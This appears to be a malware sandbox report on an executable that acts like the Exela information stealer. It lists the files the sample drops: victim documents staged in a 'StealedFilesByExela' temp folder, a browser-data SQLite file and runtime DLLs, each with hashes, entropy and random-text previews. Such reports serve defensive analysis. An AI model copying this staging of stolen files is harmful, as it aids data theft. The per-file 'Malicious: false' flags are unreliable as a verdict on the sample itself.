IFVOMWEUJULPMGUSEWAZAHAZVGRSWNQYXPMKFWQGODZHVNOEXZBPLONONBPAHCDWEMSFLRJBFMOKMCLAGRJEGRTGVETXSZKDXQWEOD

C:\Users\user\AppData\Local\Temp\StealedFilesByExela\LFOPODGVOH.jpg

Download File

Process:	C:\Users\user\Desktop\9afaXJv52z.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698393795110914
Encrypted:	false
SSDEEP:	24:weX7B5oYsT2B9e4Feb4OKL65JIiga/zOnv9iY81icgfiTetEc8E:FPoYsqB9e4dP63IigGOvo11LetEc8E
MD5:	7C5655873C22D2522B13B34841F82038
SHA1:	ED733AE5B3E813B97D69E7283AEB8085EFC62B78
SHA-256:	9A515FAA0EE108930EC0C597C9E2CA74B21C3C9D45F3F845954A65F3FA4C494D
SHA-512:	A98C25203B5A8C5C3FE7859E1B128BA3C0B5691BE716C53CA427770F10EC65CBB8B704EEA994BCE1ECA69EC4D46BCC0D48FE844653B964E96D1248D2E211CBD2
Malicious:	false
Preview:	LFOPODGVOHLLKBCXZQUOXPFEKGPKVDEYIZRZGQPAXXVWAHGTCBCWCYBHYOPHLEVYFLCEXNMVAAPUECIPRDZTIBJFGFXDAEMKYPYGCWSRTCUEEDISUDHVYQEPCSIKRBOXVZVTBFVUQHQYHEIWQPMZFNXNKGPPDGDMKJWAYJVYMRCYCWORBYPZYIFTAANBVDPJJOGYMYDPMPCNSOQVKLKNKHQVJQRYOOACYXVWFBJGOZRXUBDUSJEQNJXCVPHTUWAVCILOAXOWIJVWKMAIOEWTHGQELYIGVJJZNFBDSZXPZMLZNFDRIJQQQDSSMCBEMRHVOYIGRXSYQYDLBDBDJCVRREJGRUBPNYBFUCUXLMUIULULHCWJQQEMKBQMLJBDJQHFXPNODSTVZXWZZOXPIXKBRKMKOYEBDUBYOGMGXHFMCUIKRQYQMHGUBUAAFTMUCZNIIVAIOOBIASAJPKXIYIQIRVIIXGNUEDAXQJYWQXOBTAINKSTSHZGNUWVHVDUXVGWBWRXOYEGSIRNXRHBFOAWRQVFKAGDUSHRWQWJQRNMOGHTWFHOOZGRSVCSEJNMPDYUGTSBOMGHSHACUNTVVGKNAZSSLLQOXMCBVKFFAQLQCWYNIWPVJRECIKVCXZGCNHKXMQDPPOURAWIKZOZEFLDUYVIGDPGUMGOGBUYKGLVLWQSDAHAAIVFUNWQIWKRCSLCPMZBWBBDTBBVTZNYCLEIZNLQRHKBOLVTUTWSURDWQTCHAPUMJQWNVWVGFLAAPEHMLBUSYJCZDJUMZMKIOKIMVTYPMCXUXWVXIMVUCNXESHIVCKNFAALGDXCVJHQZWLDSAWNJWFBTHDBKGVKXLWDOPOOBJMPJCKUXVNFQVOUEIHJKOHTDCQCDOFQBMSQNWVDKTKWJIFVOMWEUJULPMGUSEWAZAHAZVGRSWNQYXPMKFWQGODZHVNOEXZBPLONONBPAHCDWEMSFLRJBFMOKMCLAGRJEGRTGVETXSZKDXQWEOD

C:\Users\user\AppData\Local\Temp\StealedFilesByExela\LFOPODGVOH.xlsx

Download File

Process:	C:\Users\user\Desktop\9afaXJv52z.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698393795110914
Encrypted:	false
SSDEEP:	24:weX7B5oYsT2B9e4Feb4OKL65JIiga/zOnv9iY81icgfiTetEc8E:FPoYsqB9e4dP63IigGOvo11LetEc8E
MD5:	7C5655873C22D2522B13B34841F82038
SHA1:	ED733AE5B3E813B97D69E7283AEB8085EFC62B78
SHA-256:	9A515FAA0EE108930EC0C597C9E2CA74B21C3C9D45F3F845954A65F3FA4C494D
SHA-512:	A98C25203B5A8C5C3FE7859E1B128BA3C0B5691BE716C53CA427770F10EC65CBB8B704EEA994BCE1ECA69EC4D46BCC0D48FE844653B964E96D1248D2E211CBD2
Malicious:	false
Preview:	LFOPODGVOHLLKBCXZQUOXPFEKGPKVDEYIZRZGQPAXXVWAHGTCBCWCYBHYOPHLEVYFLCEXNMVAAPUECIPRDZTIBJFGFXDAEMKYPYGCWSRTCUEEDISUDHVYQEPCSIKRBOXVZVTBFVUQHQYHEIWQPMZFNXNKGPPDGDMKJWAYJVYMRCYCWORBYPZYIFTAANBVDPJJOGYMYDPMPCNSOQVKLKNKHQVJQRYOOACYXVWFBJGOZRXUBDUSJEQNJXCVPHTUWAVCILOAXOWIJVWKMAIOEWTHGQELYIGVJJZNFBDSZXPZMLZNFDRIJQQQDSSMCBEMRHVOYIGRXSYQYDLBDBDJCVRREJGRUBPNYBFUCUXLMUIULULHCWJQQEMKBQMLJBDJQHFXPNODSTVZXWZZOXPIXKBRKMKOYEBDUBYOGMGXHFMCUIKRQYQMHGUBUAAFTMUCZNIIVAIOOBIASAJPKXIYIQIRVIIXGNUEDAXQJYWQXOBTAINKSTSHZGNUWVHVDUXVGWBWRXOYEGSIRNXRHBFOAWRQVFKAGDUSHRWQWJQRNMOGHTWFHOOZGRSVCSEJNMPDYUGTSBOMGHSHACUNTVVGKNAZSSLLQOXMCBVKFFAQLQCWYNIWPVJRECIKVCXZGCNHKXMQDPPOURAWIKZOZEFLDUYVIGDPGUMGOGBUYKGLVLWQSDAHAAIVFUNWQIWKRCSLCPMZBWBBDTBBVTZNYCLEIZNLQRHKBOLVTUTWSURDWQTCHAPUMJQWNVWVGFLAAPEHMLBUSYJCZDJUMZMKIOKIMVTYPMCXUXWVXIMVUCNXESHIVCKNFAALGDXCVJHQZWLDSAWNJWFBTHDBKGVKXLWDOPOOBJMPJCKUXVNFQVOUEIHJKOHTDCQCDOFQBMSQNWVDKTKWJIFVOMWEUJULPMGUSEWAZAHAZVGRSWNQYXPMKFWQGODZHVNOEXZBPLONONBPAHCDWEMSFLRJBFMOKMCLAGRJEGRTGVETXSZKDXQWEOD

C:\Users\user\AppData\Local\Temp\StealedFilesByExela\LIJDSFKJZG.png

Download File

Process:	C:\Users\user\Desktop\9afaXJv52z.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.69486718145169
Encrypted:	false
SSDEEP:	24:XvKYeI9D5UOyoiaxIKgpZ9ONvMyTONN5ZjJH1U:yyD6yxILZ9OtTT+XRG
MD5:	E63B196AE0D5F7670244FB1347D75EFC
SHA1:	1C17108AC7E5263674836BAD67AE44D8C3C6890B
SHA-256:	D8C0D7B9CDFC72CAAB0A7687299B6734708E98C6DD088CDB0FF1A659E294B49D
SHA-512:	63345352964E1BD19AC843F82820E9B29C5BA991A002AB9B3164E1AA10B6D88BFA0DFAFA2E91E584835BA89B6A1770140AC14EA0B4B64E6C3BF8CDA34C9698AC
Malicious:	false
Preview:	LIJDSFKJZGBDGXNCCVBULCELYCDFJRIXKMFPVDHHKPYEYOXKFYMNEETRQHXLDRVBOTNERMYOYUJOPHUSKFPWBGKNJYBGZTTHNKGNUZWATSMORYBOIKBFSVUUMZNDYXOYKYUKGRNFVRQOPBEEIPDGTPBXCNLKHMGPHFCEQOUTEDGJZTMFUUGECZETRSODGZCJVQEAMRZADPDVQRANZOSHTGPOXPXGXXQDJVYZOCNXDECWJISPPIJOZUBSSKPGODUHTISNESPZRLELINJJYOXSBFTVUDENIBRDIMMGFIQNDGUSXDBHQNJRYLFTZGOCELKZGOQQKNDPFAMTXHBKHJYXYEGLJLANRMMTCVEFYRTWLXIMCCHDWVOLGVUWRNLSIBMLMBKVSYLKXRTMZROHVHCRDBCODTPNVQMBPRJGBGOOFVGDIERMXUFETJQWDXSQQFMQAZGGRVNRCUOAVYJDIMQETJOANIIDEGJCHEFRSNVBQAQBBUTTMXBTJXRHLSOCTPPBIKPXITOOCINTVZYAVQLVOOZWSOPLYJPOTKFKIKEHIDDPCDDEPKVDYQAVTVBFYYWCGUKGIDVLQSIPXISDEDNJWONTSILFUGUYMKQLKEJGOOCBYSXDFHNFHHWGLXWWQKSSOHSSTZLRZVRHZVBZGGEZQFSIWQQPMILSPBAMPAGAHHVJJCITDTJRZTRBEXSXOVDKONGLMSWBAOOYAFISJHKEYUKIWXBFUDUMVQRELEPVTNQBALAQOEAEFVPIKNYIPNICGKQFRVXNQUEFULLOYWMHOMUFEMHYNKNWMAOBGWSECZOKWISDOIKSUVWBGWPNAMFUHBRWEJQPHFPEKIRLAEPTBNRQEUVXXIZSSOOEFEETUMNPSVEAKOXVYHAOIXBEYBVXDJXZCNDVOPZLARFFUSXUOWXQBKDLINBWBQLXLHHNIXZEPCNHFEIZUZSTXWFUITSBKYSELMNKNBBDQMNLAIOSKYHCWGFPNUXAFSRHOWYH

C:\Users\user\AppData\Local\Temp\StealedFilesByExela\NIRMEKAMZH.jpg

Download File

Process:	C:\Users\user\Desktop\9afaXJv52z.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.694574194309462
Encrypted:	false
SSDEEP:	24:57msLju1di6quBsK4eI3+RkAjyMKtB/kS0G1:gmjuC1uBsNeAokAUB/GE
MD5:	78801AF1375CDD81ED0CC275FE562870
SHA1:	8ED80B60849A4665F11E20DE225B9ACB1F88D5A9
SHA-256:	44BF2D71E854D09660542648F4B41BC00C70ABA36B4C8FD76F9A8D8AB23B5276
SHA-512:	E20D16EC40FEF1A83DB1FC39A84B691870C30590FC70CA38CC83A8F08C08F626E3136ADBF3B731F85E5768561C8829C42DF3B97C726191FEF3859272A03E99E0
Malicious:	false
Preview:	NIRMEKAMZHIQPCHHYDLDLONNDCJFTRECXCDYNWSMACINEWVUDRAWELIDKGUGOSLGTIKNJSPGIFRTNFPWDBIHISPKHOBWBMPRCMOQQAVOUVQODKWHOMRFLDKYATGCKZVKRHTCMHJJGYWRTELTQOLJXKPKLCWLNKOQBPNOJHARBPHMNOZRAICCUCIEHOFBKAUBHQNVPQAWMIZZGYXPDVFFYAGVHCILYWHPIYXMHCXNZJBHOBSYJEJJTXWKIBAQBZGNDHAWRNDJBFGUEFMOHHHXTBQHMIBGPLFFGAEFCSIDIGIIDPUHNETSAWPCSJJCDZPMLCWGKVYJOMJWFUXHEQSIPJDTRUPSCBCTYFLTMLRFJUXIBNGXSREQTWHFPIDSKBRTLLRUTFDXFIDFUXMZCFABRMLSHWFSZTZUJRPKXKHBWYAPJLBFVPDCCGSQYVSJDWWNYUXGFFAMCEWZRCITRTQVISLFKGNMRYVUJTQWJUFSLPGOANDHPJXZJWSWQJJZLPACFDBTCFPQMXOVHIOAMCIQCTLIBSRXETYYSVLPHVURWFAJBQPHFKWZOFSUIKXWOHPOJGFCCQGRXFMTCKHSWJPWBLFTLVERFEAFHASTRMUQSDEUNXGDSWWTOQTUBAZVNLXDRFCZWKUVIGVXHTLERNSTFJCPGLHSIFYNUWMACSMFBHFDCZSOPZRKQGTETMPYNUQPOTCKDJQXQUUMEWVKVIEYDAEXLRTMQQSTAVCIBCOSHDMRFFHIAQDBBMBEOMTPGHKJIAYMKMTMXYUVORUJUGSHEHFCYZUALULRJGKXINMJWUWMPZOJOUMUEFFWCKOWNLIEVQWZPJMTQVIEDAFICXPPSUGBPZSMHDQOIXNDWLCSVZUHTSHAPPFDAEETYFLSNJFPXRPZYQLZLSJQALWIOEGAOFDHHNAOIWCTFHXKZJROQRTVBGVHJKRUCGBHKRLCZODATMBGLOISTFOETTXPJOPGPPJYNFXWQFALNGZLGZVJ

C:\Users\user\AppData\Local\Temp\StealedFilesByExela\QFAPOWPAFG.png

Download File

Process:	C:\Users\user\Desktop\9afaXJv52z.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.690474000177721
Encrypted:	false
SSDEEP:	24:2OgtZqoLtXCKESzKP+tziBUswJwLVk9zxY/tks7VMejXhggCon:cLtXZEmKPopswJEqxUkp82an
MD5:	A01E6B89B2F69F2DA25CB28751A6261C
SHA1:	48C11C0BECEB053F3DB16EC43135B20360E77E9B
SHA-256:	0D0EB85E2964B5DDA19C78D11B536C72544AE51B09DBEC26E70C69ADDC7E9AA5
SHA-512:	1E335E567B7F959E7524E532E257FBC0A21818BDCE0B909F83CBBCE8013FA61A8D665D7DED0982F87B29A5A786A0EE7129792A1B2D48DD205180569D9E919059
Malicious:	false
Preview:	QFAPOWPAFGZUMXROWPODMNAMXJGGULHBVFMBDFCUTBDPEHPYKVYAURAEPYZMHPBECXOGPOKPNMKAIBYHBFNFVWPHHZFRFVAYYHSJZJTHAYESIKJCXVOVANTTAMQKCXEHJRYFSWGEELTALODIPFLWFILANHAGQENMCPNFLPAJIPRNZRAIETALHZECBIKVUBLJMHNYJXPSAMZZCVZQOHLATXYVRZQROYHFKLVOJLGRAGXLMXJHKHSSCTHDFNSLOUEZPTFGVVVGCDIXIBWQFIIFACZAYUUQZJRKZXJQPLVPFTJAMSPRDIBBPPFLUCOUPPQDSFKQXMEIFUXXAGKAWLWJPNBHZSGIAFFXPBLRMFNGMVBEWTTPFJEHMXLOZWQHEHGWBXCAMZISSZMPHUOREQDUTUEPDVLBWTFCJIFAGQOEHFIMLTDTDLYPEQZDZBBZYMKXTUKVCEROFCABVNAQXVLLCCNLEOGKLFPVSGMNNQZHFNCWNPGBCLLMTYKZMJSUDIPHSUQJQTOTICLSMQNHYJAQTVXMEZAEGNBGADHUJNJLQZSSGWRLYBWJEOTERXWRTICIVUFNKHRUSWRGABWPZDFTGSDASOKXSFUGVBUISDQNJUAOCSOANZFXTFQGDKEKGZJRMJMGTAJCTJEOCZCUZMUYKAKZZQYDRJXWZWMOXQQLWJMWAENIFMHJXMELOZTVHRLQZNWCBXKEBNUBDDOFYHNWIPPRWGDZCQLMHAOLYZIDJJXAASOVDNHNMDDCIWFPIOLQHWQCPUVUZUDVOKBMFLALCZEQWJAKTVUUDROHEKJKHQBLQZNVWSNNZFKMZLQPFYUYHNCDTCBVUUNKNZIORBFTFVKLHZTQAPWVKTTZFCTHJBBWQMZTFKADJIZZANUOLLRBSVTUCNIJWDQPYHEPWEUTFVNOACOFURIPTLDGJUOYFJRHAUIQREUKUSADZYOEDEDZRKKPKLFLFQIMMIKLOCTSOFOEZYVAGMCITCUWAOUT

C:\Users\user\AppData\Local\Temp\StealedFilesByExela\UNKRLCVOHV.docx

Download File

Process:	C:\Users\user\Desktop\9afaXJv52z.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698999446679606
Encrypted:	false
SSDEEP:	24:W9l1TKf/7G6pHxojyPqnhSz0hujim56BAhI8QR9QlFpd:6l1uFqyP5zY5moAoah
MD5:	73351F70BFEF33BEEA9E1CC192801D02
SHA1:	ACFD9C2DFA1B38FAB53EEB4730B0DF0551B45D8C
SHA-256:	F6917A805A90AC72064D294E5E0FBA4604588F7B0EB2B3A3511D1FC6887E3E24
SHA-512:	56D46FF29F86F3B314EBC6CC456A1D153D0F1245A926F82AE7FA9A6A5AD792094FEDBB5FC489929186C8A72732BE4EAFF3BCF2E508B8B2FC50B013E6166B212C
Malicious:	false
Preview:	UNKRLCVOHVAXPHOHAZYDIMBTYYPLYBYVUEQLGGJJCFCITCEMGOMMPTCXLGLYUZHZWMTUNUOFUUYAUDMSGBWJKAMIFUAYTDIKVYQPGYQSIZTANWSUNZDHBRNONSOUWVUJZFBPOZIMZOUPVAYJKSJULUHYRYUUOLYWEWFCYAZHMJKHXUZLTHEXFDNRXIUQOZHGGMDFHSXAJKHPBRPJJKVVXGMDIMEMMFXEOBQJSMYSSMPVSVUNJLJSSMEFHHLFEVPWZDDEIKQGOJPOJWTWMNPIEQXWXOBLNLDRNRUGDUXCMTURFAWMSSYAENGRWRBIJOYJNUMDYXNDETRQMYAMGJYZKZQPFPCONTLPPRLYMQJPIWCAXNOLGZOTNQEWQGBVSNORDVIXIUJAENWBXHSXSDNAMBAXUDBRCRHHYFJQLZEAGFZJUFMBIUBABNXVYITYPKRJUMGDPPABWBKNLHDKPLRUIRQXXKLFZAHHOQZHNTUNORTHIPKRZRDGRVPKIZRHYAGOVNDISDQRFXONCHILLZJTGXRZPEIPHKZXDBODDSUZIKNUVTNMZGVZQILJHRYJYZKDBLCLJFWSXRREYFFMEXBICHNCCTBTTTTZZVMSHPBKJMXPXFJNIDQFSJDMCXXUZPFVBFVKYCVFVQFUVOJWWIUNBICQVZGOZZVDJKKZTGDLWXADCBHYGUDWYWTYVYOOICLDGZXJHSTPFGQBMRCCCBJSXCPVVBKRNYTLTAOWPNJFKXUXQORRVHCHMSRAHQHFDEMZUFOFJOQFXHQBLWKNHXKEBLUJMQCFCSTBVXKUUPPXZNEWBUZPPVJFCDLXJEGEZSQSHHBNUCTRMEDMGPNZBHGEXVTWWZFELEFQQWXGHSVDMBAGZANSOHWAGHWRFCVNRSBOOZFJQONOYPNXBMHJINMGSGLMUSTAOMZXKOIHFYYSJWELBRBKMJUVQKVVFUFLDZKJVPCATVIHCISAYNPTMBEUQYJRYFUSBKOSITLVDUTJ

C:\Users\user\AppData\Local\Temp\StealedFilesByExela\UNKRLCVOHV.pdf

Download File

Process:	C:\Users\user\Desktop\9afaXJv52z.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698999446679606
Encrypted:	false
SSDEEP:	24:W9l1TKf/7G6pHxojyPqnhSz0hujim56BAhI8QR9QlFpd:6l1uFqyP5zY5moAoah
MD5:	73351F70BFEF33BEEA9E1CC192801D02
SHA1:	ACFD9C2DFA1B38FAB53EEB4730B0DF0551B45D8C
SHA-256:	F6917A805A90AC72064D294E5E0FBA4604588F7B0EB2B3A3511D1FC6887E3E24
SHA-512:	56D46FF29F86F3B314EBC6CC456A1D153D0F1245A926F82AE7FA9A6A5AD792094FEDBB5FC489929186C8A72732BE4EAFF3BCF2E508B8B2FC50B013E6166B212C
Malicious:	false
Preview:	UNKRLCVOHVAXPHOHAZYDIMBTYYPLYBYVUEQLGGJJCFCITCEMGOMMPTCXLGLYUZHZWMTUNUOFUUYAUDMSGBWJKAMIFUAYTDIKVYQPGYQSIZTANWSUNZDHBRNONSOUWVUJZFBPOZIMZOUPVAYJKSJULUHYRYUUOLYWEWFCYAZHMJKHXUZLTHEXFDNRXIUQOZHGGMDFHSXAJKHPBRPJJKVVXGMDIMEMMFXEOBQJSMYSSMPVSVUNJLJSSMEFHHLFEVPWZDDEIKQGOJPOJWTWMNPIEQXWXOBLNLDRNRUGDUXCMTURFAWMSSYAENGRWRBIJOYJNUMDYXNDETRQMYAMGJYZKZQPFPCONTLPPRLYMQJPIWCAXNOLGZOTNQEWQGBVSNORDVIXIUJAENWBXHSXSDNAMBAXUDBRCRHHYFJQLZEAGFZJUFMBIUBABNXVYITYPKRJUMGDPPABWBKNLHDKPLRUIRQXXKLFZAHHOQZHNTUNORTHIPKRZRDGRVPKIZRHYAGOVNDISDQRFXONCHILLZJTGXRZPEIPHKZXDBODDSUZIKNUVTNMZGVZQILJHRYJYZKDBLCLJFWSXRREYFFMEXBICHNCCTBTTTTZZVMSHPBKJMXPXFJNIDQFSJDMCXXUZPFVBFVKYCVFVQFUVOJWWIUNBICQVZGOZZVDJKKZTGDLWXADCBHYGUDWYWTYVYOOICLDGZXJHSTPFGQBMRCCCBJSXCPVVBKRNYTLTAOWPNJFKXUXQORRVHCHMSRAHQHFDEMZUFOFJOQFXHQBLWKNHXKEBLUJMQCFCSTBVXKUUPPXZNEWBUZPPVJFCDLXJEGEZSQSHHBNUCTRMEDMGPNZBHGEXVTWWZFELEFQQWXGHSVDMBAGZANSOHWAGHWRFCVNRSBOOZFJQONOYPNXBMHJINMGSGLMUSTAOMZXKOIHFYYSJWELBRBKMJUVQKVVFUFLDZKJVPCATVIHCISAYNPTMBEUQYJRYFUSBKOSITLVDUTJ

C:\Users\user\AppData\Local\Temp\StealedFilesByExela\VWDFPKGDUF.jpg

Download File

Process:	C:\Users\user\Desktop\9afaXJv52z.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696835919052288
Encrypted:	false
SSDEEP:	24:Fn9jgzow1W6XZpt5tv2wi/9nymo1rcjQV26NyDmb5HPZ:zjgEw1bpfTi1yfhcUV2by5HPZ
MD5:	197C0DB71198B230CF6568A2AA40C23B
SHA1:	BAE63DD78D567ED9183C0F8D72A191191745C4E5
SHA-256:	6935BFDC854F927C6F05F97AE4865ECAA22F7D10D909725B7D67D87F17FF0F41
SHA-512:	972C7D9B89EBADA01E3C2D21B391AFA317A8B587DE768875B3B7082761E17AF795BF72B49DEE71DC1F5363863EEF3C7E2966E6AE3D2E6F481E373A77163316C7
Malicious:	false
Preview:	VWDFPKGDUFQFRUPAPPQGIIRLBMRJVLIMQXSWPKBCUGCSOYPXVZRYABCFRPGQFBKSRNNBPWCDTZQKOZTHEOXCUIMHAWUSAMNXIIEPWHBTSEWOJOEJUQZAZDGIRHLRLOCXDMGTXDXEJOWMXIFWDAGYCVGTBKYMXDYOTCGCARASSUUCMCNKFTCZOAQXBNILJTUOLCZYYUZFHGWFTCHDXYTZOEGFUAJLGZANLVNEVWHIIIRSURMEOTZWVHRLOGMTVRWICZIENOPRWLNSVHXQMULNZLBRICRJVVBJMJGVHJSCKBXVMICMFJQQTCIUSXRLUSMTSWGCQDGVFRQVIURPCVBLZIFEZKBUZGKUJIZAWRLYVVXWFGKCMRQFIVHFVXBDHBEKOJAILQRRTZPUTWBVRNRLZEMFWWBQUGOQWYUEGPKIVHQJHQHSJWVVENNMOAHFXILPEJPHZOQMAVSUXBQQEJFNFIKFQWEWEPKTIQQETBFSABZAOBVXEBARHKLVLMCAFGXXBLNGBZRJQOGMNGDAODYAVKYTFOYJRZDLZIYWZNRPPVZNHCTKOIHMETIQDHDGBHUSSZDLEXZSKRZLTIUMEADMONDOIPXWOAELAEUEJDZBECSINHBJNAYCCYTMEJUWYDNJDACYHUQIQZZBMKKRCJDQSGEHBSIIWWFOPRPYXHWNRLQFZPXUQSZHWHJGRVRNYZBBQUFKAWZTIDUQSFTJJPUAKBRGABJCNWDXOUPLCRZTCKKHIKTYZOGNWDCTUTSDFJLIDJMCLEXGJRUQRWREGZISCYJSMOFQXYMCGMMJMSQASADRKRHYGUYLIBJAAJOTHXHEVLCQEGGJBJBKULCPBXSIOOIEJPQIXDQHKAQSQMLWOISQZQTMTCLGTEHDXRHOIVIVQGKJJACQWPPTBGGHHKJRRPRENADLUPCMGIERRBDQYQJFUSIHVYGVGSIQZZWUZLCSUBMKCQYKCYTJRNNKEZZWFQMXWYFKKWAXFIFRJZTE

C:\Users\user\AppData\Local\Temp\StealedFilesByExela\VWDFPKGDUF.xlsx

Download File

Process:	C:\Users\user\Desktop\9afaXJv52z.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696835919052288
Encrypted:	false
SSDEEP:	24:Fn9jgzow1W6XZpt5tv2wi/9nymo1rcjQV26NyDmb5HPZ:zjgEw1bpfTi1yfhcUV2by5HPZ
MD5:	197C0DB71198B230CF6568A2AA40C23B
SHA1:	BAE63DD78D567ED9183C0F8D72A191191745C4E5
SHA-256:	6935BFDC854F927C6F05F97AE4865ECAA22F7D10D909725B7D67D87F17FF0F41
SHA-512:	972C7D9B89EBADA01E3C2D21B391AFA317A8B587DE768875B3B7082761E17AF795BF72B49DEE71DC1F5363863EEF3C7E2966E6AE3D2E6F481E373A77163316C7
Malicious:	false
Preview:	VWDFPKGDUFQFRUPAPPQGIIRLBMRJVLIMQXSWPKBCUGCSOYPXVZRYABCFRPGQFBKSRNNBPWCDTZQKOZTHEOXCUIMHAWUSAMNXIIEPWHBTSEWOJOEJUQZAZDGIRHLRLOCXDMGTXDXEJOWMXIFWDAGYCVGTBKYMXDYOTCGCARASSUUCMCNKFTCZOAQXBNILJTUOLCZYYUZFHGWFTCHDXYTZOEGFUAJLGZANLVNEVWHIIIRSURMEOTZWVHRLOGMTVRWICZIENOPRWLNSVHXQMULNZLBRICRJVVBJMJGVHJSCKBXVMICMFJQQTCIUSXRLUSMTSWGCQDGVFRQVIURPCVBLZIFEZKBUZGKUJIZAWRLYVVXWFGKCMRQFIVHFVXBDHBEKOJAILQRRTZPUTWBVRNRLZEMFWWBQUGOQWYUEGPKIVHQJHQHSJWVVENNMOAHFXILPEJPHZOQMAVSUXBQQEJFNFIKFQWEWEPKTIQQETBFSABZAOBVXEBARHKLVLMCAFGXXBLNGBZRJQOGMNGDAODYAVKYTFOYJRZDLZIYWZNRPPVZNHCTKOIHMETIQDHDGBHUSSZDLEXZSKRZLTIUMEADMONDOIPXWOAELAEUEJDZBECSINHBJNAYCCYTMEJUWYDNJDACYHUQIQZZBMKKRCJDQSGEHBSIIWWFOPRPYXHWNRLQFZPXUQSZHWHJGRVRNYZBBQUFKAWZTIDUQSFTJJPUAKBRGABJCNWDXOUPLCRZTCKKHIKTYZOGNWDCTUTSDFJLIDJMCLEXGJRUQRWREGZISCYJSMOFQXYMCGMMJMSQASADRKRHYGUYLIBJAAJOTHXHEVLCQEGGJBJBKULCPBXSIOOIEJPQIXDQHKAQSQMLWOISQZQTMTCLGTEHDXRHOIVIVQGKJJACQWPPTBGGHHKJRRPRENADLUPCMGIERRBDQYQJFUSIHVYGVGSIQZZWUZLCSUBMKCQYKCYTJRNNKEZZWFQMXWYFKKWAXFIFRJZTE

C:\Users\user\AppData\Local\Temp\StealedFilesByExela\WSHEJMDVQC.pdf

Download File

Process:	C:\Users\user\Desktop\9afaXJv52z.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.694142261581685
Encrypted:	false
SSDEEP:	24:f9GDi2EYjkpBrLp83PYbuFr5oKIQppDgX+qrctnWyd3z+g8BHGZ:yEYjkpZYwS/oKIuA+qriTjEBHe
MD5:	E9AA17F314E072EBB015265FB63E77C0
SHA1:	1233B76350B8181FFFC438B62002C02B4AE79000
SHA-256:	F66078FCFEC2D71549136CC8B5B4EE7D33C4994E0A4E3E7C11F5ADCD819D0436
SHA-512:	719E659924CE585E4DD8CEA9BC6B5371AD810999022F874F380F50C7153D3AE97CC934E3173EF06573CAEE6CBC835A668C4D7DC2ADE597B1B0D200FCBAC67DA1
Malicious:	false
Preview:	WSHEJMDVQCWJPIIWMEHEPOBRYLOZOHFMDEEYYASRZPHJZGFNCKWIQSPBUMWBCKDMTEBFINALYAFGJUQXINNGDKSDBFBQLHYZRLLDJYSVNXVIEPIYHZGOTARYUNPFNZVRVVWIOWWFIFWCHVVHXNGKFNRNLVVSOPOMGZCDQUWJFARKTCAVVDPTCPNIDLRGSLNKZTVRAJAILYGDVIAAGIVKXRCRTRZJPKATKZAWRJTPVLTDNBDIRDWCCHBTEVEGYPYDTGSMLUDQXMQCAVHLYMRKPCVHQHMGNCGBZKOUKCCBHQPSIYIJGDVOYJJJRQLDKNVUEXDKCTANSMCHJUBIODALXWUAFPSECIRPCAEPPBACCLXBZAEDKJHLGOICLSKBQEGFCVDQOFKKAJPCTRIXBNPUDXKHSSXTDTQZSFEWHTHKFNJWHOEXGCYSYWIHFSMYJIYEESDQFMESLFQFBUJNXHWFNXIDWEUDMVGFDXPTRRRNPARVUGZAYZRHNTXHZAPBLWMHFSSHMXCYMAGONQNLTCAVPZPCAKJRMGEPDIFETDNSXWPDVMAZGTTCLNRREMVTBLOGKASYOATUDXLJKIYPPDNLZIZMWWFFDVMUFCTZZOFJORNAMGQBAFGCPTDCZBKTIGYDSCSPMIEXAMGICZNTFVNRPLGPMBXJHNCQSYNMGGPKIQJNDBDUBVIVXFILKXZXHODXZAYIDEIMZZMKQNQNBCCMZNFBKSYULDGKOMQZDUQMUVTBBTUTRZMIOZGDEUPHCDKJQDSGBXYNWPWTHYVLGGYNOBJJKAZSTKJSBCHVCLGWYHCNILYSCYCHTGYOGMNGWDZAVDCOVKWJPWVNTTKFTSHAAXLYUEWEVGETFCFTLKWTQCVAMBWYOYJVXNPSSWXJXUZDXJOZNTBLIZLLJQXYNILILMHHONBPAPFMVWEMHIHAGMOXTIBNNEBGCVSZEZTMJVDXSVACSKTAVTFOOSEHZQGTOUSCIQBVIWZGABQNZGJE

C:\Users\user\AppData\Local\Temp\Web.db

Download File

Process:	C:\Users\user\Desktop\9afaXJv52z.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1215420383712111
Encrypted:	false
SSDEEP:	384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
MD5:	9A809AD8B1FDDA60760BB6253358A1DB
SHA1:	D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
SHA-256:	95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
SHA-512:	2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI67202\VCRUNTIME140.dll

Download File

Process:	C:\Users\user\Desktop\9afaXJv52z.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	98736
Entropy (8bit):	6.474996871326343
Encrypted:	false
